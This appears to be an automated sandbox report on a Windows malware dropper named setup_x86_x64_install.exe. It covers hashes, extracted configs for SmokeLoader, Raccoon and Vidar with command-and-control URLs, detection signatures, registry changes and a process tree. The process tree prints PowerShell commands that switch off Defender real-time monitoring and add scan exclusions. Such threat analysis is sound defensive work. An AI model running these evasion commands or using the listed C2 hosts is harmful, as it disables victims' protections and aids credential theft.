Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
85s -
max time network
1804s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
26-10-2021 14:24
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Malware Config
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
raccoon
187e8d46623768b376fedb48580157fafedb4942
-
url4cnc
http://telegin.top/frombobu98s
http://ttmirror.top/frombobu98s
http://teletele.top/frombobu98s
http://telegalive.top/frombobu98s
http://toptelete.top/frombobu98s
http://telegraf.top/frombobu98s
https://t.me/frombobu98s
Extracted
vidar
41.5
933
https://mas.to/@xeroxxx
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/1300-351-0x0000000002010000-0x0000000002C5A000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral1/files/0x0006000000012296-175.dat family_socelars behavioral1/memory/2360-295-0x0000000003510000-0x0000000006052000-memory.dmp family_socelars -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/1572-329-0x0000000000400000-0x0000000002F6E000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0006000000012242-70.dat aspack_v212_v242 behavioral1/files/0x0006000000012242-71.dat aspack_v212_v242 behavioral1/files/0x0007000000012222-72.dat aspack_v212_v242 behavioral1/files/0x0007000000012222-73.dat aspack_v212_v242 behavioral1/files/0x0006000000012252-76.dat aspack_v212_v242 behavioral1/files/0x0006000000012252-77.dat aspack_v212_v242 -
Blocklisted process makes network request 2 IoCs
flow pid Process 28 1960 cmd.exe 36 908 schtasks.exe -
Downloads MZ/PE file
-
Executes dropped EXE 49 IoCs
pid Process 1548 setup_installer.exe 1416 setup_install.exe 572 Tue09c257807a702a4.exe 920 Tue0985edbf92e08954.exe 908 Tue0978af55b9.exe 1132 Tue09c6db969ab9.exe 1364 Tue09c1731fe55c7.exe 1960 Tue0947ef38552fc.exe 296 Tue097328c1b990.exe 1660 Tue091e2054cef7.exe 956 Process not Found 1800 Tue093cbcf0222440.exe 1040 Tue09a30919dc5f00.exe 1640 Tue09792fda06e.exe 1420 Tue0956c36b51.exe 1012 Tue09786995c7f02a923.exe 2044 cmd.exe 1892 Tue093cbcf0222440.exe 2076 Tue0990c8b597f.tmp 2252 Tue0990c8b597f.exe 2348 Tue0990c8b597f.tmp 2616 LzmwAqmV.exe 2652 WG1uEEN.EXe 2952 BCleanSoft82.exe 3004 postback.exe 1884 inst1.exe 1340 b9ZA84Ju73K3rui6bNdFtEBM.exe 1572 Soft1WW02.exe 2360 3284079687.exe 2184 4.exe 2552 5.exe 1824 search_hyperfs_206.exe 2288 run.exe 1912 run2.exe 2416 1251774.exe 2700 setup.exe 1636 juanli-game.exe 1816 692194.exe 1732 6054034.exe 1156 7749375.exe 1772 taskeng.exe 2824 2531529.exe 1812 8482633.exe 1484 Tue0971aafeebb6f.exe 1996 Calculator Installation.exe 2228 10.exe 768 Chrome5.exe 2676 Tue09c6db969ab9.exe 2944 Tue09c1731fe55c7.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Tue09c257807a702a4.exe -
Loads dropped DLL 64 IoCs
pid Process 1080 setup_x86_x64_install.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 964 cmd.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 112 cmd.exe 1108 cmd.exe 1628 cmd.exe 1628 cmd.exe 1000 cmd.exe 1000 cmd.exe 1232 cmd.exe 1900 cmd.exe 1784 cmd.exe 1072 cmd.exe 1960 Tue0947ef38552fc.exe 1960 Tue0947ef38552fc.exe 1140 cmd.exe 1132 Tue09c6db969ab9.exe 1132 Tue09c6db969ab9.exe 1632 cmd.exe 1632 cmd.exe 1672 cmd.exe 836 cmd.exe 836 cmd.exe 956 Process not Found 956 Process not Found 2016 cmd.exe 1040 Tue09a30919dc5f00.exe 1040 Tue09a30919dc5f00.exe 1152 cmd.exe 1152 cmd.exe 1640 Tue09792fda06e.exe 1640 Tue09792fda06e.exe 1800 WScript.exe 1800 WScript.exe 1532 cmd.exe 1420 Tue0956c36b51.exe 1420 Tue0956c36b51.exe 1800 WScript.exe 1012 Tue09786995c7f02a923.exe 1012 Tue09786995c7f02a923.exe 2044 cmd.exe 2044 cmd.exe 2044 cmd.exe 1892 Tue093cbcf0222440.exe 1892 Tue093cbcf0222440.exe 2076 Tue0990c8b597f.tmp 2076 Tue0990c8b597f.tmp 2076 Tue0990c8b597f.tmp 2076 Tue0990c8b597f.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 90 freegeoip.app 91 freegeoip.app 98 freegeoip.app 14 ip-api.com 52 ipinfo.io 53 ipinfo.io 83 freegeoip.app -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2288 set thread context of 1672 2288 run.exe 123 PID 1364 set thread context of 2944 1364 taskkill.exe 125 -
autoit_exe 6 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000012284-138.dat autoit_exe behavioral1/files/0x0006000000012284-176.dat autoit_exe behavioral1/files/0x0006000000012284-170.dat autoit_exe behavioral1/files/0x0006000000012284-189.dat autoit_exe behavioral1/files/0x0006000000012284-190.dat autoit_exe behavioral1/memory/2360-295-0x0000000003510000-0x0000000006052000-memory.dmp autoit_exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0990c8b597f.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Tue0990c8b597f.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-QCUDF.tmp Tue0990c8b597f.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 3036 572 WerFault.exe 37 2524 2184 WerFault.exe 92 2928 2552 WerFault.exe 94 3212 2228 WerFault.exe 121 3660 2360 WerFault.exe 93 3464 1572 WerFault.exe 89 3624 1484 WerFault.exe 62 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue09792fda06e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue09792fda06e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue09792fda06e.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 908 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 3692 taskkill.exe 1364 taskkill.exe 2680 taskkill.exe 3376 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms schtasks.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery schtasks.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage schtasks.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive schtasks.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{15A44F71-3669-11EC-A131-467ED70F84D8} = "0" schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main schtasks.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic schtasks.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1640 Tue09792fda06e.exe 1640 Tue09792fda06e.exe 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 2348 Tue0990c8b597f.tmp 2348 Tue0990c8b597f.tmp 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe 572 Tue09c257807a702a4.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1640 Tue09792fda06e.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 908 iexplore.exe Token: SeDebugPrivilege 920 Tue0985edbf92e08954.exe Token: SeDebugPrivilege 2680 taskkill.exe Token: SeDebugPrivilege 2952 BCleanSoft82.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2184 4.exe Token: SeDebugPrivilege 2552 5.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 2524 WerFault.exe Token: SeDebugPrivilege 2228 10.exe Token: SeShutdownPrivilege 1284 Process not Found Token: SeShutdownPrivilege 1284 Process not Found Token: SeDebugPrivilege 1660 Tue091e2054cef7.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1960 Tue0947ef38552fc.exe 1960 Tue0947ef38552fc.exe 1960 cmd.exe 1284 Process not Found 1284 Process not Found 2348 Tue0990c8b597f.tmp 1960 cmd.exe 1960 cmd.exe 1960 cmd.exe 1284 Process not Found 1284 Process not Found 1960 cmd.exe 1960 cmd.exe 1960 cmd.exe 1284 Process not Found 1284 Process not Found 1912 run2.exe 1284 Process not Found 1284 Process not Found 1284 Process not Found 1284 Process not Found 1912 run2.exe 1912 run2.exe 1284 Process not Found 1284 Process not Found -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 1960 Tue0947ef38552fc.exe 1960 Tue0947ef38552fc.exe 1960 cmd.exe 1284 Process not Found 1284 Process not Found 1960 cmd.exe 1960 cmd.exe 1960 cmd.exe 1960 cmd.exe 1960 cmd.exe 1912 run2.exe 1912 run2.exe 1912 run2.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 908 schtasks.exe 908 schtasks.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1284 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1080 wrote to memory of 1548 1080 setup_x86_x64_install.exe 28 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1548 wrote to memory of 1416 1548 setup_installer.exe 29 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1888 1416 setup_install.exe 31 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 1848 1416 setup_install.exe 32 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 112 1416 setup_install.exe 33 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 964 1416 setup_install.exe 34 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1900 1416 setup_install.exe 35 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 1416 wrote to memory of 1108 1416 setup_install.exe 36 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 964 wrote to memory of 572 964 cmd.exe 37 PID 112 wrote to memory of 920 112 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC0622336\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:1300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1848
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:572 -
C:\Users\Admin\Pictures\Adobe Films\b9ZA84Ju73K3rui6bNdFtEBM.exe"C:\Users\Admin\Pictures\Adobe Films\b9ZA84Ju73K3rui6bNdFtEBM.exe"6⤵
- Executes dropped EXE
PID:1340
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 14486⤵
- Program crash
PID:3036
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Loads dropped DLL
PID:1900 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue097328c1b990.exeTue097328c1b990.exe5⤵
- Executes dropped EXE
PID:296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Loads dropped DLL
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\7zSC0622336\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
PID:908 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Users\Admin\AppData\Roaming\1251774.exe"C:\Users\Admin\AppData\Roaming\1251774.exe"8⤵
- Executes dropped EXE
PID:2416
-
-
C:\Users\Admin\AppData\Roaming\692194.exe"C:\Users\Admin\AppData\Roaming\692194.exe"8⤵
- Executes dropped EXE
PID:1816
-
-
C:\Users\Admin\AppData\Roaming\6054034.exe"C:\Users\Admin\AppData\Roaming\6054034.exe"8⤵
- Executes dropped EXE
PID:1732
-
-
C:\Users\Admin\AppData\Roaming\7749375.exe"C:\Users\Admin\AppData\Roaming\7749375.exe"8⤵
- Executes dropped EXE
PID:1156
-
-
C:\Users\Admin\AppData\Roaming\3061424.exe"C:\Users\Admin\AppData\Roaming\3061424.exe"8⤵PID:1772
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:3300
-
-
-
C:\Users\Admin\AppData\Roaming\2531529.exe"C:\Users\Admin\AppData\Roaming\2531529.exe"8⤵
- Executes dropped EXE
PID:2824 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵PID:3512
-
-
-
C:\Users\Admin\AppData\Roaming\8482633.exe"C:\Users\Admin\AppData\Roaming\8482633.exe"8⤵
- Executes dropped EXE
PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
- Executes dropped EXE
PID:1572 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 9288⤵
- Program crash
PID:3464
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2184 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2184 -s 14488⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2552 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2552 -s 14728⤵
- Program crash
PID:2928
-
-
-
